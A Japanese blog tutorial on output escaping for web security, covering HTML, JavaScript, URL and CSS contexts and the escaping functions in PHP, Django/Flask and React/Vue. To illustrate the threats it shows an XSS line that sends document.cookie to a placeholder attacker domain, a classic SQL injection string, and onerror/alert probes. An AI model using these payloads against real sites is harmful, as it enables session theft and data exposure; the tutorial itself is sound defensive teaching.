Webセキュリティの要!正しいエスケープ処理の方法をマスターして安全な開発を

2025年4月28日月曜日

セキュアコーディング

Web開発で必須の知識、「エスケープ処理の方法」について、どこよりも分かりやすく解説します!

この記事では、エスケープ処理がなぜ必要なのか、どんな危険を防げるのか、そしてHTMLやJavaScript、SQLなど、場面に応じた正しいエスケープ処理の方法を、初心者の方でも「なるほど!」と思えるように説明していきます。

「セキュリティって難しそう…」なんて思っている人も、この記事を読めば大丈夫。読み終わる頃には、きっと自信を持ってコードを書けるようになっているはずですよ!

この記事で学べること

  • エスケープ処理の基本
  • エスケープ処理をサボると起きる怖いこと(XSS、SQLインジェクション)
  • HTML、JavaScript、URLなど、場面ごとの正しいエスケープ処理の方法
  • 主要なプログラミング言語での簡単なエスケープ関数の使い方
  • エスケープ処理でやりがちなミスと注意点

エスケープ処理とは?セキュアコーディングにおける重要性

エスケープ処理とは、ざっくり言うと、プログラムにとって特別な意味を持つ文字を、ただの文字として扱われるように変換することです。

セキュアコーディング、つまり安全なプログラムを作る上で、避けては通れない基本的なテクニックなんですよ。

例えば、ユーザーが入力したコメントをWebページに表示する場面を考えてみましょう。
もし、入力された文字をそのまま表示してしまうと、悪意のあるユーザーがHTMLタグやJavaScriptコード(例えば、<script>alert('罠だよ!')</script>のような)を入力した場合、それがそのまま実行されてしまう可能性があります。

そうなると、ページを見た他のユーザーが意図しない動作をさせられたり、個人情報が盗まれたりする危険があるんです。怖すぎますよね…。

エスケープ処理は、そうした危険な文字を「ただの文字列」に変換(例:<&lt; にする)して、プログラムとして実行されないように無害化する役割を果たします。

地味に見えるかもしれませんが、Webアプリケーションの安全を守るための、まさに縁の下の力持ちなんです。

なぜ必要?エスケープ処理の方法を怠ると狙われる代表的な脆弱性

エスケープ処理をちゃんとしないと、具体的にどんなヤバいことが起きるのか? 代表的なものとして、ここでは「クロスサイトスクリプティング(XSS)」と「SQLインジェクション」の2つを紹介しますね。

どちらも、攻撃者にシステムの情報を盗まれたり、Webサイトを改ざんされたりする原因になる、とっても危険な脆弱性です。エスケープ処理は、これらの攻撃を防ぐための基本的な防御策となります。

クロスサイトスクリプティング(XSS)とその対策としてのエスケープ処理

クロスサイトスクリプティング(XSS)は、攻撃者がWebサイトの入力フォームなどを悪用して、悪意のあるスクリプト(主にJavaScript)を他のユーザーのブラウザ上で実行させる攻撃です。

例えば、コメント欄にこんなコードが入力されたとします。

<script>document.location='http://罠サイト.example.com/?cookie='+document.cookie;</script>

もしエスケープ処理がされていないと、このコメントが表示されたページを開いた他のユーザーは、自分のクッキー情報(ログイン情報などが含まれることがある)を知らないうちに罠サイトに送信させられてしまうかもしれません。

HTMLエスケープ処理を行うことで、<> といった文字を、HTMLタグとして解釈されない安全な文字列(&lt;&gt;)に変換します。こうすることで、スクリプトがただの文字として表示され、実行されるのを防ぐことができます。

&lt;script&gt;document.location='http://罠サイト.example.com/?cookie='+document.cookie;&lt;/script&gt;

↑こうなれば、ただの文字列なので安全です。

SQLインジェクションとその対策としてのエスケープ処理

SQLインジェクションは、データベースと連携するWebアプリケーションで、入力値の処理に不備がある場合に、攻撃者が不正なSQL文を実行させてしまう攻撃です。

例えば、ユーザーIDを入力してユーザー情報を検索する機能があったとしましょう。内部的にこんなSQL文が実行されるとします。

SELECT * FROM users WHERE id = '(ユーザーが入力したID)';

もし攻撃者がIDとして ' OR '1'='1 という文字列を入力し、エスケープ処理がされていなかったら、実行されるSQL文はこうなってしまいます。

SELECT * FROM users WHERE id = '' OR '1'='1';

'1'='1' は常に真(正しい)なので、WHERE句の条件が実質無効になり、usersテーブルの全ユーザー情報が取得されてしまうかもしれません!

入力値に含まれるシングルクォート(')などを適切にエスケープ(例:' を \' や '' に変換)することで、SQL文の構造が破壊されるのを防ぎます。

ただし、SQLインジェクション対策としては、エスケープ処理よりも「プレースホルダ」を使う方が、より安全で推奨される方法です。プレースホルダについては、また別の機会に詳しく解説しますね。

【コンテキスト別】正しいエスケープ処理の方法を実践

エスケープ処理と一口に言っても、実はデータを出力する場所(コンテキスト)によって、適切なエスケープの方法が違うんです。

ここを間違えると、せっかくエスケープしても意味がなかったり、逆に表示が崩れたりすることもあります。

ここでは、よくある出力コンテキストごとに、どんなエスケープ処理が必要なのかを見ていきましょう!

HTMLエスケープの方法と注意点

ユーザーが入力したテキストなどを、HTMLの要素の中身(例:<p>ここ</p>)や、属性値(例:<input type="text" value="ここ">)に表示する場合に必要なのがHTMLエスケープです。

主に以下の文字を変換します。

  • <&lt;
  • >&gt;
  • &&amp;
  • "&quot;
  • '&#39; (または &apos;

特にHTMLタグの属性値の中に展開する場合は、ダブルクォーテーションやシングルクォーテーションのエスケープが重要になります。 

多くのプログラミング言語には、このHTMLエスケープを行うための便利な関数が用意されています(後で紹介しますね)。

例えば、PHPでユーザー入力 $userInput をHTMLに出力する場合:

<?php
$userInput = '<script>alert("XSS!");</script>';

// これがHTMLエスケープ
$escapedOutput = htmlspecialchars($userInput, ENT_QUOTES, 'UTF-8');

echo '<p>' . $escapedOutput . '</p>';
// 出力結果: <p>&lt;script&gt;alert(&quot;XSS!&quot;);&lt;/script&gt;</p>
// ブラウザ上では <script>alert("XSS!");</script> と表示され、スクリプトは実行されない
?>

JavaScriptエスケープの方法と注意点

サーバーサイドから渡されたデータを、JavaScriptのコードの中で文字列として使いたい場合、JavaScriptにとって特別な意味を持つ文字をエスケープする必要があります。

例えば、ユーザー名をJavaScriptの変数に代入する場合などです。

var username = '(サーバーから渡されたエスケープ済みのユーザー名)';
alert('こんにちは、' + username + 'さん!');

この場合、主に以下の文字のエスケープが必要です。

  • シングルクォート('
  • ダブルクォート("
  • バックスラッシュ(\
  • 改行文字(\n, \r
  • U+2028 (LINE SEPARATOR), U+2029 (PARAGRAPH SEPARATOR)
  • HTMLのタグ開始文字(<)も、</script> と誤認されるのを防ぐためにエスケープすることが推奨されます。

JavaScriptに変数を渡す際は、JSON形式でエンコードして渡すのが、多くの場合で安全かつ簡単です。 JSONエンコードは、必要なJavaScriptエスケープを適切に行ってくれます。

PHPで例を見てみましょう。

<?php
$userData = [
    'name' => "O'Malley",
    'message' => "改行を含む\nメッセージ<script>alert(1)</script>"
];

// JSONエンコードでJavaScriptに安全な形式に変換
$jsonUserData = json_encode($userData, JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP);
?>

<script>
  // JSON文字列をJavaScriptオブジェクトにパース
  var user = JSON.parse('<?php echo $jsonUserData; ?>');

  console.log(user.name);    // 出力: O'Malley
  console.log(user.message); // 出力: 改行を含む\nメッセージ<script>alert(1)</script> (アラートは実行されない)

  // 直接文字列リテラルに入れる場合もJSONエンコードが便利
  var message = <?php echo json_encode($userData['message'], JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP); ?>;
  console.log(message);
</script>

json_encode のオプション(JSON_HEX_TAGなど)で、より安全性を高めることができます。

URLエスケープ(パーセントエンコーディング)の方法

URLの一部として、特にクエリ文字列(URLの?以降の部分)にユーザー入力などのデータを含める場合、URLとして特別な意味を持つ文字や、URLに使えない文字をエンコードする必要があります。

これをURLエンコード、またはパーセントエンコーディングと呼びます。

例えば、検索キーワードをURLパラメータで渡す場合:

https://example.com/search?query=(エンコードされた検索キーワード)

エンコードが必要な文字には、半角スペース、&=?#などの記号や、日本語のようなマルチバイト文字が含まれます。

多くの言語にはURLエンコード用の関数があります。

  • PHP: urlencode() または rawurlencode()
  • JavaScript: encodeURIComponent()
  • Python: urllib.parse.quote_plus()

encodeURIComponent() (JavaScript) や rawurlencode() (PHP) のように、URLのパス部分やクエリパラメータの値そのものをエンコードする関数を使うのが一般的です。

JavaScriptの例:

let searchQuery = "エスケープ処理 & 方法?";
let encodedQuery = encodeURIComponent(searchQuery);
console.log(encodedQuery);
// 出力: %E3%82%A8%E3%82%B9%E3%82%B1%E3%83%BC%E3%83%97%E5%87%A6%E7%90%86%20%26%20%E6%96%B9%E6%B3%95%3F

let url = "https://example.com/search?query=" + encodedQuery;
console.log(url);
// 出力: https://example.com/search?query=%E3%82%A8%E3%82%B9%E3%82%B1%E3%83%BC%E3%83%97%E5%87%A6%E7%90%86%20%26%20%E6%96%B9%E6%B3%95%3F

CSSエスケープの方法(必要なケースは限定的)

ユーザーが入力した値をCSSのスタイル指定に使う、といった場面はあまり多くありませんが、もしそういうケースがあればCSSエスケープが必要になることもあります。

例えば、ユーザーが選んだ色名をCSSのクラス名の一部に使う場合などです。CSSで特別な意味を持つ文字(例:数字で始まる文字列、特定の記号)をエスケープする必要があります。

ただし、ユーザー入力をCSSの値として直接使うのは、セキュリティリスクを伴う場合があるので、基本的には避けるべき設計です。 どうしても必要な場合は、入力値を厳密にチェック(バリデーション)し、許可された値のみを使うようにした上で、慎重にエスケープ処理を行いましょう。

CSSのエスケープは少し複雑なので、ライブラリを使うか、OWASPのチートシートなどを参照するのがおすすめです。

【言語・フレームワーク別】便利なエスケープ処理関数の使い方

ここまでコンテキスト別のエスケープ処理を見てきましたが、「じゃあ具体的にどうやってコード書くの?」と思いますよね。

幸いなことに、ほとんどのプログラミング言語やWebフレームワークには、これらのエスケープ処理を簡単かつ安全に行ってくれる便利な関数や機能が用意されています!

自分で一からエスケープ処理を実装するのは、漏れがあったり間違いやすかったりするので、基本的には標準で用意されている関数や、信頼できるライブラリを使うようにしましょう。

ここでは、いくつかの代表的な言語・フレームワークでの例を紹介します。

PHPでのエスケープ処理の方法 htmlspecialcharsなど

PHPでWeb開発をするなら、以下の関数は必須で覚えておきましょう。

  • htmlspecialchars()
    HTMLエスケープの基本。<, >, &, ", ' をエスケープします。第2引数でエスケープするクォートの種類(ENT_QUOTES推奨)、第3引数で文字コード('UTF-8'推奨)を指定できます。HTMLに出力する際は、ほぼ必ずこの関数を使います。
  • htmlentities()
    htmlspecialchars() に加えて、適用可能な全ての文字をHTMLエンティティに変換します。通常は htmlspecialchars() で十分なことが多いです。
  • urlencode() / rawurlencode()
    URLエンコード用。スペースを + にするか %20 にするかなどの違いがあります。通常、クエリパラメータの値には rawurlencode() が適しています。
  • json_encode()
    変数をJSON形式にエンコードします。JavaScriptにデータを渡す際に非常に便利で、適切なエスケープも行ってくれます(オプション指定推奨)。
<?php
$unsafe_input = '<script>alert("PHP!");</script>';
$query_param = '検索 & クエリ?';

// HTMLエスケープ
$safe_html = htmlspecialchars($unsafe_input, ENT_QUOTES, 'UTF-8');
echo '<div>' . $safe_html . '</div>';
// 出力: <div>&lt;script&gt;alert(&quot;PHP!&quot;);&lt;/script&gt;</div>

// URLエンコード
$safe_query = rawurlencode($query_param);
echo '<a href="/search?q=' . $safe_query . '">検索</a>';
// 出力: <a href="/search?q=%E6%A4%9C%E7%B4%A2%20%26%20%E3%82%AF%E3%82%A8%E3%83%AA%3F">検索</a>

// JavaScriptへのデータ渡し (JSON)
$data_for_js = ['message' => $unsafe_input];
$safe_json = json_encode($data_for_js, JSON_HEX_TAG | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_HEX_AMP);
echo '<script>var data = JSON.parse(\'' . $safe_json . '\'); console.log(data.message);</script>';
// script内で安全に扱える
?>

データベース操作(SQL)の場合は、PDOなどのライブラリを使ってプレースホルダ(プリペアドステートメント)を利用するのが鉄則です。これによりSQLインジェクションを効果的に防げます。

Python (Django/Flask)でのエスケープ処理の方法

Pythonにも便利な機能があります。特にWebフレームワークを使うと、多くの場合、自動でエスケープ処理が行われます。

  • html.escape()
    Python標準ライブラリの関数で、HTMLエスケープを行います。<, >, & をエスケープします。quote=True オプションでダブルクォートもエスケープできます。
  • Django
    テンプレートエンジンがデフォルトでHTMLエスケープを自動的に行います。 そのため、通常は意識する必要はありません。意図的にエスケープを無効にする |safe フィルタもありますが、使う際は細心の注意が必要です。
  • Flask
    デフォルトで使われるJinja2テンプレートエンジンも、同様に自動でHTMLエスケープを行います。 こちらも |safe フィルタで無効化できますが、注意が必要です。
  • urllib.parse.quote() / urllib.parse.quote_plus()
    URLエンコード用の関数です。
  • json.dumps()
    JSONエンコード用。JavaScriptへのデータ渡しに使えます。

Djangoテンプレートの例

<!-- views.py などで渡された変数 user_input を表示 -->
<!-- user_input が <script>alert('Django!')</script> だとしても -->

<p>{{ user_input }}</p>

<!-- 自動的にエスケープされ、以下のように出力される -->
<!-- <p>&lt;script&gt;alert('Django!')&lt;/script&gt;</p> -->

<!-- もしエスケープしたくない場合(HTMLタグとして解釈させたい場合。非推奨) -->
<p>{{ user_input|safe }}</p>

データベース操作は、Django ORMやSQLAlchemyなどのORMを使うのが一般的で、これらはSQLインジェクション対策(プレースホルダの使用など)を内部で行ってくれます。

JavaScript (Node.js/React/Vue)でのエスケープ処理の方法

JavaScript環境、特にモダンなフロントエンドフレームワークでは、XSS対策としてのエスケープが組み込まれていることが多いです。

  • Node.js
    HTMLエスケープには、escape-htmlのような信頼できるライブラリを使うのが一般的です。URLエンコードには標準のencodeURIComponent()が使えます。
  • React
    JSX内で中括弧 {} を使って変数を展開すると、デフォルトで文字列はエスケープされます。 これにより、基本的なXSSは防止されます。HTMLを意図的に埋め込みたい場合は dangerouslySetInnerHTML というプロパティがありますが、名前の通り危険なので、使う場合は内容を厳密に管理する必要があります。
  • Vue.js
    マスタッシュ構文 {{ }}v-bind ディレクティブで変数を展開すると、デフォルトでHTMLエスケープされます。 HTMLをそのまま埋め込むには v-html ディレクティブがありますが、React同様、使用には注意が必要です。
  • 共通
    URLエンコードには encodeURIComponent() が使えます。JavaScriptの文字列エスケープが必要な場合は、JSONエンコード(JSON.stringify())が役立つことが多いです。

Reactの例

function UserProfile({ userInput }) {
  // userInput が "<img src=x onerror=alert('React!')>" だとしても
  const dangerousInput = "<img src=x onerror=alert('React!')>";

  return (
    <div>
      <p>ユーザー入力: {userInput}</p>
      {/* 上記は自動でエスケープされ、文字列として表示される */}
      {/* 例: <p>ユーザー入力: &lt;img src=x onerror=alert('React!')&gt;</p> */}

      {/* どうしてもHTMLとして埋め込みたい場合(非推奨) */}
      <div dangerouslySetInnerHTML={{ __html: dangerousInput }} />
      {/* 上記はimgタグとして解釈され、アラートが実行される可能性がある */}
    </div>
  );
}

フレームワークが提供するエスケープ機能を信頼し、dangerouslySetInnerHTMLv-html のような機能は極力使わないのが安全な開発のコツです。

エスケープ処理実装時のよくある間違いと注意点

便利な関数やフレームワークの機能があっても、使い方を間違えると意味がなかったり、新たな問題を生んだりすることもあります。ここでは、エスケープ処理でやりがちなミスと注意点をいくつか挙げておきますね。

  • コンテキスト間違い
    HTMLに出力するのにURLエンコードしたり、その逆をしたり。出力先のコンテキストに合った正しいエスケープ関数を選びましょう。
  • エスケープ漏れ
    ユーザー入力が表示される可能性のある箇所全てで、きちんとエスケープ処理を行う必要があります。「ここは大丈夫だろう」という油断が脆弱性を生みます。
  • 二重エスケープ
    同じデータに対して複数回エスケープ処理をしてしまうと、表示がおかしくなることがあります(例:&lt; がさらにエスケープされて &amp;lt; になる)。フレームワークの自動エスケープ機能と手動のエスケープが重複しないように注意が必要です。
  • エスケープすべきでない箇所でのエスケープ
    例えば、安全であることが保証されている内部的な固定URLなどを誤ってエスケープしてしまうと、リンクが機能しなくなることがあります。
  • サニタイズとの混同
    エスケープは「特殊文字を無害化する」処理ですが、サニタイズは「不正・不要なデータ(HTMLタグや属性など)を除去・修正する」処理です。目的が違うので、混同しないようにしましょう。例えば、リッチテキストエディタからの入力を許可したい場合は、エスケープではなく、許可されたタグ・属性のみを残すサニタイズ処理が必要になります。入力時にバリデーション(検証)やサニタイズを行い、出力時にエスケープを行う、というのが基本的な流れです。
  • ライブラリ・フレームワーク頼りすぎの油断
    フレームワークが自動エスケープしてくれるからといって、全て安全とは限りません。特定の状況下(例:|safeフィルタの使用)や、フレームワークがカバーしていないコンテキスト(例:CSSへの出力)では、開発者が意識して対策する必要があります。

「なんか表示がおかしいな?」と思ったら、エスケープ処理が適切に行われているか、一度立ち止まって確認する癖をつけると良いでしょう。

【まとめ】正しいエスケープ処理の方法を理解しセキュアコーディングを実践しよう

いやー、お疲れ様でした!エスケープ処理の世界、少しは身近に感じてもらえたでしょうか?

今回のポイントをまとめておきますね。

  • エスケープ処理は、特殊文字を無害化してXSSやSQLインジェクションなどの脆弱性を防ぐ、セキュアコーディングの基本!
  • データを出力する場所(HTML, JavaScript, URLなど)に応じて、正しいエスケープ方法を選ぼう!
  • 言語やフレームワークが提供する便利なエスケープ関数や機能を積極的に活用しよう!自前実装は避けるのが吉。
  • エスケープ漏れ、コンテキスト間違い、二重エスケープなどのミスに注意!
  • 入力時のバリデーション/サニタイズと、出力時のエスケープはセットで考えよう。

エスケープ処理は、Webセキュリティの本当に基本的な部分ですが、奥が深い世界でもあります。今日学んだことを土台にして、ぜひ実際のコードで意識してみてください。

まずは、自分の書いたコードの中で、ユーザー入力などの外部データをどこに表示・利用しているかを確認し、「ここはどのエスケープが必要かな?」と考えてみることから始めてみましょう。公式ドキュメントを読んだり、他の脆弱性について学んでみるのも良いステップアップになりますよ。

正しいエスケープ処理の方法をマスターして、自信を持って安全なWebアプリケーションを開発していきましょう!

このブログを検索

  • ()

自己紹介

自分の写真
リモートワークでエンジニア兼Webディレクターとして活動しています。プログラミングやAIなど、日々の業務や学びの中で得た知識や気づきをわかりやすく発信し、これからITスキルを身につけたい人にも役立つ情報をお届けします。 note → https://note.com/yurufuri X → https://x.com/mnao111

QooQ